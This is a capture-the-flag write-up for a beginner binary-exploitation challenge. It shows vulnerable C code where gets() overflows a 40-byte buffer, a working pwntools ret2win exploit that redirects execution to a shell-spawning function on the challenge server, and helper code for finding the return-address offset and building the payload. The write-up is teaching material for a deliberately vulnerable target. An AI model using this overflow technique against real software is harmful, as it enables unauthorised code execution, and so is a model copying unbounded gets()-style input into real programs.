# Shell this!

If you have not already, follow us on Twitter for updates and content! [@RagnarSecurity](https://twitter.com/ragnarsecurity)

This is a beginner level challenge, so here are a couple of things I recommend to people new to pwn CTF challenges:

- Get gdb-peda
- Get pwntools
- Practice Practice Practice!
- [Learn Here](https://github.com/RPISEC/MBE): This is a crash course of binary exploitation from RPI.

How to solve:

## Step 1 - Be a Reverse Engineer!

We first need to figure out what the program is doing. Luckily we are given source code.

```c
#include <stdio.h>
#include <unistd.h>

/* Runs before main(): make stdin/stdout unbuffered (2 == _IONBF) so the
 * prompt and our input are not stuck in a buffer when talking over a socket. */
__attribute__((constructor))
void setup() {
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
}

/* Never called by the program itself; this is our ret2text target. */
void get_shell() {
    execve("/bin/sh", NULL, NULL);
}

void vuln() {
    char name[40];

    printf("Please tell me your name: ");
    gets(name);   /* no length check: anything past 40 bytes overwrites the stack */
}

int main(void) {
    printf("Welcome! Can you figure out how to get this program to give you a shell?\n");
    vuln();
    printf("Unfortunately, you did not win. Please try again another time!\n");
}
```

The bug is in `vuln`: `gets(name)` reads an unbounded line into the 40-byte `name` buffer, so anything longer than the buffer runs over the saved RBP and the saved return address on the stack. The other interesting thing is `get_shell`, a function that `execve`s `/bin/sh` but is never reached by normal control flow. We do not need shellcode at all: overwrite the return address with the address of `get_shell` (a ret2text, also called ret2win, exploit). This relies on the binary not being PIE, so that `get_shell` has a fixed address; check with `pwn checksec ./shellthis` (or `checksec` in gdb-peda) before relying on the symbol address.

How to craft our exploit:

- Fill the 40-byte `name` buffer, the compiler's padding after it, and the saved RBP with whatever character you desire. In this binary that is 56 bytes in total; the offset is found by crashing the program on a cyclic pattern and looking up which bytes landed in the return address (`pattern create` / `pattern offset` in gdb-peda, or `cyclic` / `cyclic_find` in pwntools).
- Overwrite `vuln`'s saved return address with the address of `get_shell`.
- Shell! When `vuln` returns it lands in `get_shell`, and `execve` replaces the process with `/bin/sh`.

One caveat: returning straight into a function leaves RSP 8 bytes off the 16-byte alignment a normal `call` would give it. A plain `execve` wrapper does not care, but if a target such as `system()` segfaults on an SSE instruction, put a `ret` gadget in front of the `get_shell` address to fix the alignment.

```py
from pwn import *

elf = ELF('./shellthis')
context.binary = elf   # arch/bits from the binary, so ROP() and p64() use 8-byte words
p = remote("chal.duc.tf", 30002)

# 40-byte name buffer + padding + saved RBP = 56 bytes before the saved return address
junk = b'A' * 56
rop = ROP(elf)
rop.call(elf.symbols['get_shell'])   # no arguments, so the chain is just p64(get_shell)

payload = junk + rop.chain()

p.recvuntil(b"Please tell me your name: ")
p.sendline(payload)
p.interactive()
```
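To show where the `56` in the script above comes from and what the payload looks like on the wire, here is an added example (not the original writeup's code and not part of the challenge) that reimplements the two pwntools helpers the exploit leans on in plain Python: a de Bruijn `cyclic` / `cyclic_find` pair for recovering the return-address offset from a crash, and a `build_payload` that packs the junk plus the 8-byte little-endian `get_shell` address. The `GET_SHELL` address used in the demo is a hypothetical value, not one taken from the challenge binary; the "crash" is simulated by slicing the pattern at the offset, standing in for reading the return-address slot in gdb.

```python
import struct

# Added example, not the writeup's code. The get_shell address below is a
# HYPOTHETICAL non-PIE address chosen for illustration; read the real one from
# the binary (e.g. `nm ./shellthis | grep get_shell`).

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def cyclic(length, alphabet=ALPHABET, n=4):
    """Return `length` bytes of a de Bruijn sequence over `alphabet`.

    Every window of `n` bytes occurs at most once, so the bytes that land in the
    saved return address after a crash map back to a single offset. Same idea
    as gdb-peda's `pattern create` and pwntools' `cyclic()`.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:          # stop as soon as we have enough bytes
            return
        if t > n:
            if n % p == 0:
                for c in a[1:p + 1]:
                    if len(out) >= length:
                        return
                    out.append(alphabet[c])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(out) >= length:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)


def cyclic_find(chunk, alphabet=ALPHABET, n=4, search_len=4096):
    """Offset of `chunk` (e.g. the bytes that overwrote the return address) in the pattern,
    or -1 if it is not a window of the pattern. Mirrors `pattern offset` / `cyclic_find`."""
    return cyclic(search_len, alphabet, n).find(chunk)


def build_payload(get_shell_addr, offset=56):
    """Junk up to the saved return address, then the little-endian address of get_shell."""
    payload = b"A" * offset + struct.pack("<Q", get_shell_addr)
    # gets() stops reading at '\n' (0x0a) but copies NUL bytes without complaint, so the
    # high zero bytes of the address are fine and the only forbidden byte is a newline.
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets() would truncate it")
    return payload


if __name__ == "__main__":
    GET_SHELL = 0x401196   # hypothetical address, not from the challenge binary

    # Step 1: crash the program on a pattern and read back what hit the return address.
    pattern = cyclic(200)
    rip_bytes = pattern[56:64]      # constructed: simulates the bytes seen in the RIP slot
    offset = cyclic_find(rip_bytes)
    print("offset to saved return address:", offset)

    # Step 2: junk up to that offset, then the get_shell address.
    payload = build_payload(GET_SHELL, offset)
    print("payload:", payload.hex())
```

Running it prints the recovered offset (56) and a 64-byte payload; the real exploit sends exactly this shape with `elf.symbols['get_shell']` in place of the hypothetical address. If `cyclic_find` returns -1, the bytes you read were not from the pattern (a partial overwrite or the wrong register), which is the usual sign that the offset guess, not the target address, is what needs fixing.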

Original writeup (https://github.com/Ragnar-Security/ctf-writeups/tree/master/downunder-ctf/pwn/shellthis).